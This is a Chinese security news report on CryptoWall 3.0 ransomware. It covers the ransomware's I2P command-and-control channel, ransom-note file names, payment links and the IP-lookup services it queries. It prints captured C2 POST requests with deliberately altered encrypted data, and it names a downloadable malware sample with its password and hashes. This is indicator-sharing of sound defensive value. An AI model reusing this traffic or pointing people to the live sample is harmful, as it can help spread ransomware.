使用I2P匿名網(wǎng)絡(luò)通信,又一款勒索軟件CryptoWall 3.0來了
責(zé)編:admin |2015-01-19 10:52:27FreeBuf已經(jīng)報(bào)道過不計(jì)其數(shù)的勒索軟件,而最近研究人員又發(fā)現(xiàn)了一款特別的——它使用I2P匿名網(wǎng)絡(luò)進(jìn)行通信,名為Cryptowall 3.0。
一天感染288個(gè)用戶
來自法國的安全研究員Kafeine在其博客中確認(rèn)了這款軟件使用I2P匿名網(wǎng)絡(luò)進(jìn)行C&C通訊,在@Horgh_RCE的反編譯下為我們揭開了Cryptowall 3.0的面紗。
微軟提供的數(shù)據(jù)顯示從1月11日至1月12日一天時(shí)間里,Cryptowall感染了288個(gè)用戶。
相較之前的變種,軟件在用于勒索的提示文件的文件名上有少許變化:
HELP_DECRYPT.HTML
HELP_DECRYPT.PNG
HELP_DECRYPT.TXT
HELP_DECRYPT.URL
貼心的用戶體驗(yàn)
以下則是HELP_DECRYPT.PNG的內(nèi)容:
該款勒索軟件十分貼心,HELP_DECRYPT.PNG語言版本是根據(jù)用戶的IP決定的,如法國安全研究員Kafeine的HELP_DECRYPT.PNG:
針對不同的用戶,文中的鏈接也各不相同。以下是Kafeine提供的一組鏈接:
http://paytoc4gtpn5czl2.torforall.com/1c3L59z
http://paytoc4gtpn5czl2.torman2.com/1c3L59z
http://paytoc4gtpn5czl2.torwoman.com/1c3L59z
http://paytoc4gtpn5czl2.torroadsters.com/1c3L59z
軟件完成對用戶文件的加密后會提示用戶使用比特幣支付贖金。自CoinVault之后,免費(fèi)解密一個(gè)文件似乎要變成行業(yè)標(biāo)準(zhǔn)了,CryptoWall 3.0也附帶了這一功能:
軟件使用以下服務(wù)獲取IP:
"http://ip-addr.es"
"http://myexternalip.com/raw"
"http://curlmyip.com"
I2P協(xié)議傳輸
與C&C服務(wù)器的通訊似乎是通過Rc4加密了,并且數(shù)據(jù)通過i2p協(xié)議傳輸:
————–數(shù)據(jù)稍經(jīng)修改——-
POST http://proxy2-2-2.i2p/p1256nl9su84v HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Content-Length: 134
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: proxy2-2-2.i2p
v=ec3eafb5dc5dc44d97d2431fe0a6503683360c2c4e5b508a1c45e51b64de6d13d031063ed7ce7e6f9740e95e614e63541eec23ac50312847479a8eba8dd46295a27c
—————數(shù)據(jù)稍經(jīng)修改——-
POST http://proxy1-1-1.i2p/hz13ackt0y HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Content-Length: 134
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: proxy1-1-1.i2p
z=1eeac100e243ed18d3feef446e7800f38c49dc63d7142ce2c024d6a6502e109fcdcee52fa6e59d45648f195d8579265652c334af833ebc7f8e40edcc55ac1c6db626
————————————————–
經(jīng)過解密后的數(shù)據(jù):(不要嘗試解密前面的數(shù)據(jù),我們故意修改了有些十六進(jìn)制數(shù))
z={1|crypt1|27CE3C5E636291E531C77FA566559DDF|2|1|2||xxx.xxx.xxx.xxx}
樣本下載
Cryptowall_3.0.zip,密碼:infected
文件應(yīng)包含6c3e6143ab699d6b78551d417c0a1a45和47363b94cee907e2b8926c1be61150c7
- 周鴻祎領(lǐng)銜!百所高校+企業(yè)組團(tuán)亮相ISC.AI 2025“紅衣課堂”
- 港科大發(fā)布大模型越獄攻擊評估基準(zhǔn),覆蓋6大類別37種方法
- 引領(lǐng)智能運(yùn)維!全新FortiAIOps 3.0重新定義IT運(yùn)營
- MirageFlow:一種針對Tor的新型帶寬膨脹攻擊
- 英偉達(dá)約談事件的制度邏輯與趨勢展望
- 國家互聯(lián)網(wǎng)信息辦公室發(fā)布《國家信息化發(fā)展報(bào)告(2024年)》
- 火狐中國終止運(yùn)營:辦公地?zé)o人,用戶賬號數(shù)據(jù)面臨清空
- 25年一直未變!網(wǎng)絡(luò)安全永恒的“十大法則”
- 關(guān)于征集數(shù)據(jù)安全評估標(biāo)準(zhǔn)化應(yīng)用實(shí)踐案例的通知
- ISC.AI 2025主題前瞻:ALL IN AGENT,全面擁抱智能體時(shí)代!